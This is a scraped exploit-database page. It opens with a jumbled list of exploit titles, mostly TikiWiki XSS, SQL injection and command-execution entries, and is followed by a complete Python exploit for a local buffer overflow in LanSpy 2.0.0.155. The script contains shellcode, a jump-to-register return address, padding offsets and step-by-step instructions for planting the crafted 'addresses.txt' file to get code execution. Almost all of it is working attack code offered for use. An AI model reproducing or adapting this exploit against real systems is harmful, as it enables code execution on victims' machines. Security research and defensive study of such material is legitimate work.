557f116d02
8 new exploits TikiWiki 1.9 Sirius - (jhot.php) Remote Command Execution TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution TikiWiki 1.9.5 Sirius - (sort_mode) Information Disclosure TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution TikiWiki < 1.9.9 - tiki-listmovies.php Directory Traversal TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal TikiWiki Project 1.8 - tiki-switch_theme.php theme Parameter Cross-Site Scripting TikiWiki Project 1.8 - img/wiki_up Arbitrary File Upload TikiWiki Project 1.8 - tiki-map.phtml Traversal Arbitrary File / Directory Enumeration TikiWiki Project 1.8 - 'tiki-switch_theme.php' theme Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration TikiWiki Project 1.8 - categorize.php Direct Request Full Path Disclosure TikiWiki Project 1.8 - messu-mailbox.php Multiple Parameter Cross-Site Scripting TikiWiki Project 1.8 - messu-read.php Multiple Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-browse_categories.php parentId Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-index.php comments_threshold Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-list_file_gallery.php galleryID Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'messu-read.php' Multiple Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-read_article.php' articleId Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-browse_categories.php' parentId Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-index.php' comments_threshold Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-print_article.php' articleId Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' galleryID Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-upload_file.php galleryID Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-view_faq.php faqId Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-view_chart.php chartId Parameter Cross-Site Scripting TikiWiki Project 1.8 - tiki-usermenu.php sort_mode Parameter SQL Injection TikiWiki Project 1.8 - tiki-list_file_gallery.php sort_mode Parameter SQL Injection TikiWiki Project 1.8 - 'tiki-upload_file.php' galleryID Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-view_faq.php' faqId Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-view_chart.php' chartId Parameter Cross-Site Scripting TikiWiki Project 1.8 - 'tiki-usermenu.php' sort_mode Parameter SQL Injection TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' sort_mode Parameter SQL Injection Symantec pcAnywhere 12.5.0 Windows (x86) - Remote Code Execution Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046) Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page) LanSpy 2.0.0.155 - Local Buffer Overflow ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure Cgiemail 1.6 - Source Code Disclosure Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123) Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124) Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)
80 lines
2.3 KiB
Python
Executable file
80 lines
2.3 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###
|
|
|
|
# Date: 2016-10-18
|
|
# Exploit Author: n30m1nd
|
|
# Vendor Homepage: www.lantricks.com
|
|
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
|
|
# Version: LanSpy 2.0.0.155
|
|
# Tested on: Tested on Win7 32bit and Win10 64 bit
|
|
|
|
# Platforms
|
|
# =========
|
|
# Tested on Win7 32bit and Win10 64 bit
|
|
# This exploit should work everywhere since the binary does not implement DEP nor ASLR
|
|
|
|
# Credits
|
|
# =======
|
|
# Shouts to hyp3rlinx for the PoC:
|
|
# https://www.exploit-db.com/exploits/38399/
|
|
# http://hyp3rlinx.altervista.org/
|
|
# And shouts to the crew at Offensive Security for their huge efforts on making
|
|
# the infosec community better
|
|
|
|
# How to
|
|
# ======
|
|
# * Run this python script. It will generate an "addresses.txt" file.
|
|
# * Replace this file in the root directory of your LanSpy.exe installation.
|
|
# * Run LanSpy.exe and start the scan or do so by pressing F3.
|
|
# - You can also call LanSpy.exe from the command line like the following and
|
|
# it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe
|
|
|
|
# Exploit code
|
|
# ============
|
|
|
|
import struct
|
|
|
|
# 32bit Alphanum-ish shellcodes
|
|
# Bad chars detected: 00 2d 20
|
|
|
|
# MessageBoxA at => 00404D80
|
|
msgbox_shellcode = (
|
|
"\x31\xC0\x50\x68"
|
|
"\x70\x77\x6E\x64"
|
|
"\x54\x5F\x50\x57"
|
|
"\x57\x50\x35\xC4"
|
|
"\x80\x80\x55\x35"
|
|
"\x44\xCD\xC0\x55"
|
|
"\x50\xC3"
|
|
)
|
|
|
|
# WinExec at -> 004EC4FF
|
|
calc_shellcode = (
|
|
"\x31\xC0\x50\x68"
|
|
"\x63\x61\x6C\x63"
|
|
"\x54\x5F\x50\x57"
|
|
"\x35\xC3\x4E\xC3"
|
|
"\x55\x35\x3C\x8A"
|
|
"\x8D\x55\x50\xC3"
|
|
)
|
|
|
|
# Change the shellcode to be used here
|
|
scde = calc_shellcode
|
|
#scde = msgbox_shellcode
|
|
|
|
# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
|
|
junk = 'A'*(676-126)
|
|
if len(scde) > 126:
|
|
exit("[e] Shellcode is too big! Egghunter maybe? ;)")
|
|
|
|
# 0040407D => jmp ecx inside LanSpy
|
|
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)
|
|
|
|
# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
|
|
payl = junk + scde + jecx
|
|
|
|
with open("addresses.txt", "wb") as f:
|
|
f.write(payl)
|
|
f.close()
|
|
|